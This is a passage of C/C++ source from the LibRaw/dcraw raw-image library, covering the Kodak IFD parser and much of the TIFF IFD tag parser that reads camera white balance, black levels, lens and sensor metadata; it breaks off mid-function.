imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][1];
}
if (tag == 0xfa2a)
{
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c] = get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][1];
}
if (tag == 2120 + wbi ||
(wbi<0 && tag == 2125)) /* use Auto WB if illuminant index is not set */
{
FORC3 mul[c] = (num=getreal(type))==0 ? 1 : num;
FORC3 cam_mul[c] = mul[1] / mul[c]; /* normalise against green */
}
if (tag == 2317) linear_table (len);
if (tag == 0x903) iso_speed = getreal(type);
//if (tag == 6020) iso_speed = getint(type);
if (tag == 64013) wbi = fgetc(ifp);
if ((unsigned) wbi < 7 && tag == wbtag[wbi])
FORC3 cam_mul[c] = get4();
if (tag == 64019) width = getint(type);
if (tag == 64020) height = (getint(type)+1) & -2;
fseek (ifp, save, SEEK_SET);
}
}
#else
void CLASS parse_kodak_ifd (int base)
{
unsigned entries, tag, type, len, save;
int i, c, wbi=-2, wbtemp=6500;
float mul[3]={1,1,1}, num;
static const int wbtag[] = { 64037,64040,64039,64041,-1,-1,64042 };
entries = get2();
if (entries > 1024) return;
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
if (tag == 1020) wbi = getint(type);
if (tag == 1021 && len == 72) { /* WB set in software */
fseek (ifp, 40, SEEK_CUR);
FORC3 cam_mul[c] = 2048.0 / fMAX(1.0,get2());
wbi = -2;
}
if (tag == 2118) wbtemp = getint(type);
if (tag == 2120 + wbi && wbi >= 0)
FORC3 cam_mul[c] = 2048.0 / fMAX(1.0,getreal(type));
if (tag == 2130 + wbi)
FORC3 mul[c] = getreal(type);
if (tag == 2140 + wbi && wbi >= 0)
FORC3 {
for (num=i=0; i < 4; i++)
num += getreal(type) * pow (wbtemp/100.0, i);
cam_mul[c] = 2048 / fMAX(1.0,(num * mul[c]));
}
if (tag == 2317) linear_table (len);
if (tag == 6020) iso_speed = getint(type);
if (tag == 64013) wbi = fgetc(ifp);
if ((unsigned) wbi < 7 && tag == wbtag[wbi])
FORC3 cam_mul[c] = get4();
if (tag == 64019) width = getint(type);
if (tag == 64020) height = (getint(type)+1) & -2;
fseek (ifp, save, SEEK_SET);
}
}
#endif
//@end COMMON
void CLASS parse_minolta (int base);
int CLASS parse_tiff (int base);
//@out COMMON
int CLASS parse_tiff_ifd (int base)
{
unsigned entries, tag, type, len, plen=16, save;
int ifd, use_cm=0, cfa, i, j, c, ima_len=0;
char *cbuf, *cp;
uchar cfa_pat[16], cfa_pc[] = { 0,1,2,3 }, tab[256];
double fm[3][4], cc[4][4], cm[4][3], cam_xyz[4][3], num;
double ab[]={ 1,1,1,1 }, asn[] = { 0,0,0,0 }, xyz[] = { 1,1,1 };
unsigned sony_curve[] = { 0,0,0,0,0,4095 };
unsigned *buf, sony_offset=0, sony_length=0, sony_key=0;
struct jhead jh;
int pana_raw = 0;
#ifndef LIBRAW_LIBRARY_BUILD
FILE *sfp;
#endif
if (tiff_nifds >= sizeof tiff_ifd / sizeof tiff_ifd[0])
return 1;
ifd = tiff_nifds++;
for (j=0; j < 4; j++)
for (i=0; i < 4; i++)
cc[j][i] = i == j;
entries = get2();
if (entries > 512) return 1;
#ifdef LIBRAW_LIBRARY_BUILD
INT64 fsize = ifp->size();
#endif
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
#ifdef LIBRAW_LIBRARY_BUILD
INT64 savepos = ftell(ifp);
if(len > 8 && len + savepos > fsize*2) continue; // skip tag pointing out of 2xfile
if(callbacks.exif_cb)
{
callbacks.exif_cb(callbacks.exifparser_data,tag|(pana_raw?0x30000:0),type,len,order,ifp);
fseek(ifp,savepos,SEEK_SET);
}
#endif
#ifdef LIBRAW_LIBRARY_BUILD
if (!strncasecmp(make, "SONY", 4) ||
(!strncasecmp(make, "Hasselblad", 10) &&
(!strncasecmp(model, "Stellar", 7) ||
!strncasecmp(model, "Lunar", 5) ||
!strncasecmp(model, "HV",2))))
{
switch (tag) {
case 0x7300: // SR2 black level
for (int i = 0; i < 4 && i < len; i++)
cblack[i] = get2();
break;
case 0x7480:
case 0x7820:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][1];
break;
case 0x7481:
case 0x7821:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][1];
break;
case 0x7482:
case 0x7822:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][1];
break;
case 0x7483:
case 0x7823:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][1];
break;
case 0x7484:
case 0x7824:
imgdata.color.WBCT_Coeffs[0][0] = 4500;
FORC3 imgdata.color.WBCT_Coeffs[0][c+1] = get2();
imgdata.color.WBCT_Coeffs[0][4] = imgdata.color.WBCT_Coeffs[0][2];
break;
case 0x7486:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][1];
break;
case 0x7825:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][1];
break;
case 0x7826:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][1];
break;
case 0x7827:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][1];
break;
case 0x7828:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][1];
break;
case 0x7829:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][1];
break;
case 0x782a:
imgdata.color.WBCT_Coeffs[1][0] = 8500;
FORC3 imgdata.color.WBCT_Coeffs[1][c+1] = get2();
imgdata.color.WBCT_Coeffs[1][4] = imgdata.color.WBCT_Coeffs[1][2];
break;
case 0x782b:
imgdata.color.WBCT_Coeffs[2][0] = 6000;
FORC3 imgdata.color.WBCT_Coeffs[2][c+1] = get2();
imgdata.color.WBCT_Coeffs[2][4] = imgdata.color.WBCT_Coeffs[2][2];
break;
case 0x782c:
imgdata.color.WBCT_Coeffs[3][0] = 3200;
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_StudioTungsten][c] = imgdata.color.WBCT_Coeffs[3][c+1] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_StudioTungsten][3] = imgdata.color.WBCT_Coeffs[3][4] = imgdata.color.WB_Coeffs[LIBRAW_WBI_StudioTungsten][1];
break;
case 0x782d:
imgdata.color.WBCT_Coeffs[4][0] = 2500;
FORC3 imgdata.color.WBCT_Coeffs[4][c+1] = get2();
imgdata.color.WBCT_Coeffs[4][4] = imgdata.color.WBCT_Coeffs[4][2];
break;
case 0x787f:
FORC3 imgdata.color.linear_max[c] = get2();
imgdata.color.linear_max[3] = imgdata.color.linear_max[1];
break;
}
}
#endif
switch (tag) {
case 1: if(len==4) pana_raw = get4(); break;
case 5: width = get2(); break;
case 6: height = get2(); break;
case 7: width += get2(); break;
case 9: if ((i = get2())) filters = i;
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw && len == 1 && type ==3)
pana_black[3]+=i;
#endif
break;
case 8:
case 10:
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw && len == 1 && type ==3)
pana_black[3]+=get2();
#endif
break;
case 14: case 15: case 16:
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw) {
imgdata.color.linear_max[tag-14] = get2();
if (tag == 15 ) imgdata.color.linear_max[3] = imgdata.color.linear_max[1];
}
#endif
break;
case 17: case 18:
if (type == 3 && len == 1)
cam_mul[(tag-17)*2] = get2() / 256.0;
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 19:
if(pana_raw) {
ushort nWB, cnt, tWB;
nWB = get2();
if (nWB > 0x100) break;
for (cnt=0; cnt<nWB; cnt++) {
tWB = get2();
if (tWB < 0x100) {
imgdata.color.WB_Coeffs[tWB][0] = get2();
imgdata.color.WB_Coeffs[tWB][2] = get2();
imgdata.color.WB_Coeffs[tWB][1] = imgdata.color.WB_Coeffs[tWB][3] = 0x100;
} else get4();
}
}
break;
#endif
case 23:
if (type == 3) iso_speed = get2();
break;
case 28: case 29: case 30:
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw && len == 1 && type ==3)
{
pana_black[tag-28] = get2();
}
else
#endif
{
cblack[tag-28] = get2();
cblack[3] = cblack[1];
}
break;
case 36: case 37: case 38:
cam_mul[tag-36] = get2();
break;
case 39:
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw) {
ushort nWB, cnt, tWB;
nWB = get2();
if (nWB > 0x100) break;
for (cnt=0; cnt<nWB; cnt++) {
tWB = get2();
if (tWB < 0x100) {
imgdata.color.WB_Coeffs[tWB][0] = get2();
imgdata.color.WB_Coeffs[tWB][1] = imgdata.color.WB_Coeffs[tWB][3] = get2();
imgdata.color.WB_Coeffs[tWB][2] = get2();
} else fseek(ifp, 6, SEEK_CUR);
}
}
break;
#endif
if (len < 50 || cam_mul[0]) break;
fseek (ifp, 12, SEEK_CUR);
FORC3 cam_mul[c] = get2();
break;
case 46:
if (type != 7 || fgetc(ifp) != 0xff || fgetc(ifp) != 0xd8) break;
thumb_offset = ftell(ifp) - 2;
thumb_length = len;
break;
case 61440: /* Fuji HS10 table */
fseek (ifp, get4()+base, SEEK_SET);
parse_tiff_ifd (base);
break;
case 2: case 256: case 61441: /* ImageWidth */
tiff_ifd[ifd].t_width = getint(type);
break;
case 3: case 257: case 61442: /* ImageHeight */
tiff_ifd[ifd].t_height = getint(type);
break;
case 258: /* BitsPerSample */
case 61443:
tiff_ifd[ifd].samples = len & 7;
tiff_ifd[ifd].bps = getint(type);
if (tiff_bps < tiff_ifd[ifd].bps)
tiff_bps = tiff_ifd[ifd].bps;
break;
case 61446:
raw_height = 0;
if (tiff_ifd[ifd].bps > 12) break;
load_raw = &CLASS packed_load_raw;
load_flags = get4() ? 24:80;
break;
case 259: /* Compression */
tiff_ifd[ifd].comp = getint(type);
break;
case 262: /* PhotometricInterpretation */
tiff_ifd[ifd].phint = get2();
break;
case 270: /* ImageDescription */
fread (desc, 512, 1, ifp);
break;
case 271: /* Make */
fgets (make, 64, ifp);
break;
case 272: /* Model */
fgets (model, 64, ifp);
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 278:
tiff_ifd[ifd].rows_per_strip = getint(type);
break;
#endif
case 280: /* Panasonic RW2 offset */
if (type != 4) break;
load_raw = &CLASS panasonic_load_raw;
load_flags = 0x2008;
case 273: /* StripOffset */
#ifdef LIBRAW_LIBRARY_BUILD
if(len > 1 && len < 16384)
{
off_t sav = ftell(ifp);
tiff_ifd[ifd].strip_offsets = (int*)calloc(len,sizeof(int));
tiff_ifd[ifd].strip_offsets_count = len;
for(int i=0; i< len; i++)
tiff_ifd[ifd].strip_offsets[i]=get4()+base;
fseek(ifp,sav,SEEK_SET); // restore position
}
/* fallback */
#endif
case 513: /* JpegIFOffset */
case 61447:
tiff_ifd[ifd].offset = get4()+base;
if (!tiff_ifd[ifd].bps && tiff_ifd[ifd].offset > 0) {
fseek (ifp, tiff_ifd[ifd].offset, SEEK_SET);
if (ljpeg_start (&jh, 1)) {
tiff_ifd[ifd].comp = 6;
tiff_ifd[ifd].t_width = jh.wide;
tiff_ifd[ifd].t_height = jh.high;
tiff_ifd[ifd].bps = jh.bits;
tiff_ifd[ifd].samples = jh.clrs;
if (!(jh.sraw || (jh.clrs & 1)))
tiff_ifd[ifd].t_width *= jh.clrs;
if ((tiff_ifd[ifd].t_width > 4*tiff_ifd[ifd].t_height) & ~jh.clrs) {
tiff_ifd[ifd].t_width /= 2;
tiff_ifd[ifd].t_height *= 2;
}
i = order;
parse_tiff (tiff_ifd[ifd].offset + 12);
order = i;
}
}
break;
case 274: /* Orientation */
tiff_ifd[ifd].t_flip = "50132467"[get2() & 7]-'0';
break;
case 277: /* SamplesPerPixel */
tiff_ifd[ifd].samples = getint(type) & 7;
break;
case 279: /* StripByteCounts */
#ifdef LIBRAW_LIBRARY_BUILD
if(len > 1 && len < 16384)
{
off_t sav = ftell(ifp);
tiff_ifd[ifd].strip_byte_counts = (int*)calloc(len,sizeof(int));
tiff_ifd[ifd].strip_byte_counts_count = len;
for(int i=0; i< len; i++)
tiff_ifd[ifd].strip_byte_counts[i]=get4();
fseek(ifp,sav,SEEK_SET); // restore position
}
/* fallback */
#endif
case 514:
case 61448:
tiff_ifd[ifd].bytes = get4();
break;
case 61454:
FORC3 cam_mul[(4-c) % 3] = getint(type);
break;
case 305: case 11: /* Software */
fgets (software, 64, ifp);
if (!strncmp(software,"Adobe",5) ||
!strncmp(software,"dcraw",5) ||
!strncmp(software,"UFRaw",5) ||
!strncmp(software,"Bibble",6) ||
!strcmp (software,"Digital Photo Professional"))
is_raw = 0;
break;
case 306: /* DateTime */
get_timestamp(0);
break;
case 315: /* Artist */
fread (artist, 64, 1, ifp);
break;
case 317:
tiff_ifd[ifd].predictor = getint(type);
break;
case 322: /* TileWidth */
tiff_ifd[ifd].t_tile_width = getint(type);
break;
case 323: /* TileLength */
tiff_ifd[ifd].t_tile_length = getint(type);
break;
case 324: /* TileOffsets */
tiff_ifd[ifd].offset = len > 1 ? ftell(ifp) : get4();
if (len == 1)
tiff_ifd[ifd].t_tile_width = tiff_ifd[ifd].t_tile_length = 0;
if (len == 4) {
load_raw = &CLASS sinar_4shot_load_raw;
is_raw = 5;
}
break;
case 325:
tiff_ifd[ifd].bytes = len > 1 ? ftell(ifp): get4();
break;
case 330: /* SubIFDs */
if (!strcmp(model,"DSLR-A100") && tiff_ifd[ifd].t_width == 3872) {
load_raw = &CLASS sony_arw_load_raw;
data_offset = get4()+base;
ifd++;
#ifdef LIBRAW_LIBRARY_BUILD
if (ifd >= sizeof tiff_ifd / sizeof tiff_ifd[0])
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
break;
}
#ifdef LIBRAW_LIBRARY_BUILD
if (!strncmp(make,"Hasselblad",10) && libraw_internal_data.unpacker_data.hasselblad_parser_flag) {
fseek (ifp, ftell(ifp)+4, SEEK_SET);
fseek (ifp, get4()+base, SEEK_SET);
parse_tiff_ifd (base);
break;
}
#endif
if(len > 1000) len=1000; /* 1000 SubIFDs is enough */
while (len--) {
i = ftell(ifp);
fseek (ifp, get4()+base, SEEK_SET);
if (parse_tiff_ifd (base)) break;
fseek (ifp, i+4, SEEK_SET);
}
break;
case 339:
tiff_ifd[ifd].sample_format = getint(type);
break;
case 400:
strcpy (make, "Sarnoff");
maximum = 0xfff;
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 700:
if((type == 1 || type == 2 || type == 6 || type == 7) && len > 1 && len < 5100000)
{
xmpdata = (char*)malloc(xmplen = len+1);
fread(xmpdata,len,1,ifp);
xmpdata[len]=0;
}
break;
#endif
case 28688:
FORC4 sony_curve[c+1] = get2() >> 2 & 0xfff;
for (i=0; i < 5; i++)
for (j = sony_curve[i]+1; j <= sony_curve[i+1]; j++)
curve[j] = curve[j-1] + (1 << i);
break;
case 29184: sony_offset = get4(); break;
case 29185: sony_length = get4(); break;
case 29217: sony_key = get4(); break;
case 29264:
parse_minolta (ftell(ifp));
raw_width = 0;
break;
case 29443:
FORC4 cam_mul[c ^ (c < 2)] = get2();
break;
case 29459:
FORC4 cam_mul[c] = get2();
i = (cam_mul[1] == 1024 && cam_mul[2] == 1024) << 1;
SWAP (cam_mul[i],cam_mul[i+1])
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 30720: // Sony matrix, Sony_SR2SubIFD_0x7800
for (i=0; i < 3; i++) {
float num = 0.0;
for (c=0; c<3; c++) {
imgdata.color.ccm[i][c] = (float) ((short)get2());
num += imgdata.color.ccm[i][c];
}
if (num > 0.01) FORC3 imgdata.color.ccm[i][c] = imgdata.color.ccm[i][c] / num;
}
break;
#endif
case 29456: // Sony black level, Sony_SR2SubIFD_0x7310, no more needs to be divided by 4
FORC4 cblack[c ^ c >> 1] = get2();
i = cblack[3];
FORC3 if(i>cblack[c]) i = cblack[c];
FORC4 cblack[c]-=i;
black = i;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr, _("...Sony black: %u cblack: %u %u %u %u\n"),black, cblack[0],cblack[1],cblack[2], cblack[3]);
#endif
break;
case 33405: /* Model2 */
fgets (model2, 64, ifp);
break;
case 33421: /* CFARepeatPatternDim */
if (get2() == 6 && get2() == 6)
filters = 9;
break;
case 33422: /* CFAPattern */
if (filters == 9) {
FORC(36) ((char *)xtrans)[c] = fgetc(ifp) & 3;
break;
}
case 64777: /* Kodak P-series */
if(len == 36)
{
filters = 9;
colors = 3;
FORC(36) xtrans[0][c] = fgetc(ifp) & 3;
}
else if(len > 0)
{
if ((plen=len) > 16) plen = 16;
fread (cfa_pat, 1, plen, ifp);
for (colors=cfa=i=0; i < plen && colors < 4; i++) {
colors += !(cfa & (1 << cfa_pat[i]));
cfa |= 1 << cfa_pat[i];
}
if (cfa == 070) memcpy (cfa_pc,"\003\004\005",3); /* CMY */
if (cfa == 072) memcpy (cfa_pc,"\005\003\004\001",4); /* GMCY */
goto guess_cfa_pc;
}
break;
case 33424:
case 65024:
fseek (ifp, get4()+base, SEEK_SET);
parse_kodak_ifd (base);
break;
case 33434: /* ExposureTime */
tiff_ifd[ifd].t_shutter = shutter = getreal(type);
break;
case 33437: /* FNumber */
aperture = getreal(type);
break;
#ifdef LIBRAW_LIBRARY_BUILD
// IB start
case 0xa405: // FocalLengthIn35mmFormat
imgdata.lens.FocalLengthIn35mmFormat = get2();
break;
case 0xa431: // BodySerialNumber
case 0xc62f:
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
break;
case 0xa432: // LensInfo, 42034dec, Lens Specification per EXIF standard
imgdata.lens.MinFocal = getreal(type);
imgdata.lens.MaxFocal = getreal(type);
imgdata.lens.MaxAp4MinFocal = getreal(type);
imgdata.lens.MaxAp4MaxFocal = getreal(type);
break;
case 0xa435: // LensSerialNumber
stmread(imgdata.lens.LensSerial, len, ifp);
break;
case 0xc630: // DNG LensInfo, Lens Specification per EXIF standard
imgdata.lens.MinFocal = getreal(type);
imgdata.lens.MaxFocal = getreal(type);
imgdata.lens.MaxAp4MinFocal = getreal(type);
imgdata.lens.MaxAp4MaxFocal = getreal(type);
break;
case 0xa433: // LensMake
stmread(imgdata.lens.LensMake, len, ifp);
break;
case 0xa434: // LensModel
stmread(imgdata.lens.Lens, len, ifp);
if (!strncmp(imgdata.lens.Lens, "----", 4))
imgdata.lens.Lens[0] = 0;
break;
case 0x9205:
imgdata.lens.EXIF_MaxAp = libraw_powf64(2.0f, (getreal(type) / 2.0f));
break;
// IB end
#endif
case 34306: /* Leaf white balance */
FORC4 cam_mul[c ^ 1] = 4096.0 / get2();
break;
case 34307: /* Leaf CatchLight color matrix */
fread (software, 1, 7, ifp);
if (strncmp(software,"MATRIX",6)) break;
colors = 4;
for (raw_color = i=0; i < 3; i++) {
FORC4 fscanf (ifp, "%f", &rgb_cam[i][c^1]);
if (!use_camera_wb) continue;
num = 0;
FORC4 num += rgb_cam[i][c];
FORC4 rgb_cam[i][c] /= MAX(1,num);
}
break;
case 34310: /* Leaf metadata */
parse_mos (ftell(ifp));
case 34303:
strcpy (make, "Leaf");
break;
case 34665: /* EXIF tag */
fseek (ifp, get4()+base, SEEK_SET);
parse_exif (base);
break;
case 34853: /* GPSInfo tag */
{
unsigned pos;
fseek(ifp, pos = (get4() + base), SEEK_SET);
parse_gps(base);
#ifdef LIBRAW_LIBRARY_BUILD
fseek(ifp, pos, SEEK_SET);
parse_gps_libraw(base);
#endif
}
break;
case 34675: /* InterColorProfile */
case 50831: /* AsShotICCProfile */
profile_offset = ftell(ifp);
profile_length = len;
break;
case 37122: /* CompressedBitsPerPixel */
kodak_cbpp = get4();
break;
case 37386: /* FocalLength */
focal_len = getreal(type);
break;
case 37393: /* ImageNumber */
shot_order = getint(type);
break;
case 37400: /* old Kodak KDC tag */
for (raw_color = i=0; i < 3; i++) {
getreal(type);
FORC3 rgb_cam[i][c] = getreal(type);
}
break;
case 40976:
strip_offset = get4();
switch (tiff_ifd[ifd].comp) {
case 32770: load_raw = &CLASS samsung_load_raw; break;
case 32772: load_raw = &CLASS samsung2_load_raw; break;
case 32773: load_raw = &CLASS samsung3_load_raw; break;
}
break;
case 46275: /* Imacon tags */
strcpy (make, "Imacon");
data_offset = ftell(ifp);
ima_len = len;
break;
case 46279:
if (!ima_len) break;
fseek (ifp, 38, SEEK_CUR);
case 46274:
fseek (ifp, 40, SEEK_CUR);
raw_width = get4();
raw_height = get4();
left_margin = get4() & 7;
width = raw_width - left_margin - (get4() & 7);
top_margin = get4() & 7;
height = raw_height - top_margin - (get4() & 7);
if (raw_width == 7262 && ima_len == 234317952 ) {
height = 5412;
width = 7216;
left_margin = 7;
filters=0;
} else if (raw_width == 7262) {
height = 5444;
width = 7244;
left_margin = 7;
}
fseek (ifp, 52, SEEK_CUR);
FORC3 cam_mul[c] = getreal(11);
fseek (ifp, 114, SEEK_CUR);
flip = (get2() >> 7) * 90;
if (width * height * 6 == ima_len) {
if (flip % 180 == 90) SWAP(width,height);
raw_width = width;
raw_height = height;
left_margin = top_margin = filters = flip = 0;
}
sprintf (model, "Ixpress %d-Mp", height*width/1000000);
load_raw = &CLASS imacon_full_load_raw;
if (filters) {
if (left_margin & 1) filters = 0x61616161;
load_raw = &CLASS unpacked_load_raw;
}
maximum = 0xffff;
break;
case 50454: /* Sinar tag */
case 50455:
if (len < 1 || len > 2560000 || !(cbuf = (char *) malloc(len))) break;
#ifndef LIBRAW_LIBRARY_BUILD
fread (cbuf, 1, len, ifp);
#else
if(fread (cbuf, 1, len, ifp) != len)
throw LIBRAW_EXCEPTION_IO_CORRUPT; // cbuf to be free'ed in recycle
#endif
cbuf[len-1] = 0;
for (cp = cbuf-1; cp && cp < cbuf+len; cp = strchr(cp,'\n'))
if (!strncmp (++cp,"Neutral ",8))
sscanf (cp+8, "%f %f %f", cam_mul, cam_mul+1, cam_mul+2);
free (cbuf);
break;
case 50458:
if (!make[0]) strcpy (make, "Hasselblad");
break;
case 50459: /* Hasselblad tag */
#ifdef LIBRAW_LIBRARY_BUILD
libraw_internal_data.unpacker_data.hasselblad_parser_flag=1;
#endif
i = order;
j = ftell(ifp);
c = tiff_nifds;
order = get2();
fseek (ifp, j+(get2(),get4()), SEEK_SET);
parse_tiff_ifd (j);
maximum = 0xffff;
tiff_nifds = c;
order = i;
break;
case 50706: /* DNGVersion */
FORC4 dng_version = (dng_version << 8) + fgetc(ifp);
if (!make[0]) strcpy (make, "DNG");
is_raw = 1;
break;
case 50708: /* UniqueCameraModel */
#ifdef LIBRAW_LIBRARY_BUILD
stmread(imgdata.color.UniqueCameraModel, len, ifp);
imgdata.color.UniqueCameraModel[sizeof(imgdata.color.UniqueCameraModel)-1] = 0;
#endif
if (model[0]) break;
#ifndef LIBRAW_LIBRARY_BUILD
fgets (make, 64, ifp);
#else
strncpy (make, imgdata.color.UniqueCameraModel, MIN(len, sizeof(imgdata.color.UniqueCameraModel)));
#endif
if ((cp = strchr(make,' '))) {
strcpy(model,cp+1);
*cp = 0;
}
break;
case 50710: /* CFAPlaneColor */
if (filters == 9) break;
if (len > 4) len = 4;
colors = len;
fread (cfa_pc, 1, colors, ifp);
guess_cfa_pc:
FORCC tab[cfa_pc[c]] = c;
cdesc[c] = 0;
for (i=16; i--; )
filters = filters << 2 | tab[cfa_pat[i % plen]];
filters -= !filters;
break;
case 50711: /* CFALayout */
if (get2() == 2) fuji_width = 1;
break;
case 291:
case 50712: /* LinearizationTable */
linear_table (len);
break;
case 50713: /* BlackLevelRepeatDim */
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_cblack[4] =
#endif
cblack[4] = get2();
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_cblack[5] =
#endif
cblack[5] = get2();
if (cblack[4] * cblack[5] > (sizeof(cblack) / sizeof (cblack[0]) - 6))
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_cblack[4]=
imgdata.color.dng_levels.dng_cblack[5]=
#endif
cblack[4] = cblack[5] = 1;
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 0xf00c: {
unsigned fwb[4];
FORC4 fwb[c] = get4();
if (fwb[3] < 0x100)
{
imgdata.color.WB_Coeffs[fwb[3]][0] = fwb[1];
imgdata.color.WB_Coeffs[fwb[3]][1] = imgdata.color.WB_Coeffs[fwb[3]][3] = fwb[0];
imgdata.color.WB_Coeffs[fwb[3]][2] = fwb[2];
if ((fwb[3] == 17) && libraw_internal_data.unpacker_data.lenRAFData>3 && libraw_internal_data.unpacker_data.lenRAFData < 10240000)
{
long long f_save = ftell(ifp);
int fj, found = 0;
ushort *rafdata = (ushort*) malloc (sizeof(ushort)*libraw_internal_data.unpacker_data.lenRAFData);
fseek (ifp, libraw_internal_data.unpacker_data.posRAFData, SEEK_SET);
fread (rafdata, sizeof(ushort), libraw_internal_data.unpacker_data.lenRAFData, ifp);
fseek(ifp, f_save, SEEK_SET);
for (int fi=0; fi<(libraw_internal_data.unpacker_data.lenRAFData-3); fi++)
{
if ((fwb[0]==rafdata[fi]) && (fwb[1]==rafdata[fi+1]) && (fwb[2]==rafdata[fi+2]))
{
if (rafdata[fi-15] != fwb[0]) continue;
fi = fi - 15;
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][3] = rafdata[fi];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][0] = rafdata[fi+1];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FineWeather][2] = rafdata[fi+2];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][3] = rafdata[fi+3];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][0] = rafdata[fi+4];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][2] = rafdata[fi+5];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][3] = rafdata[fi+6];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][0] = rafdata[fi+7];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][2] = rafdata[fi+8];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][3] = rafdata[fi+9];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][0] = rafdata[fi+10];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][2] = rafdata[fi+11];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][3] = rafdata[fi+12];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][0] = rafdata[fi+13];
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][2] = rafdata[fi+14];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][3] = rafdata[fi+15];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][0] = rafdata[fi+16];
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][2] = rafdata[fi+17];
fi += 111;
for (fj = fi; fj<(fi+15); fj+=3)
if (rafdata[fj] != rafdata[fi])
{
found = 1;
break;
}
if (found)
{
int FujiCCT_K [31] = {2500,2550,2650,2700,2800,2850,2950,3000,3100,3200,3300,3400,3600,3700,3800,4000,4200,4300,4500,4800,5000,5300,5600,5900,6300,6700,7100,7700,8300,9100,10000};
fj = fj - 93;
for (int iCCT=0; iCCT < 31; iCCT++)
{
imgdata.color.WBCT_Coeffs[iCCT][0] = FujiCCT_K[iCCT];
imgdata.color.WBCT_Coeffs[iCCT][1] = rafdata[iCCT*3+1+fj];
imgdata.color.WBCT_Coeffs[iCCT][2] = imgdata.color.WBCT_Coeffs[iCCT][4] = rafdata[iCCT*3+fj];
imgdata.color.WBCT_Coeffs[iCCT][3] = rafdata[iCCT*3+2+fj];
}
}
free (rafdata);
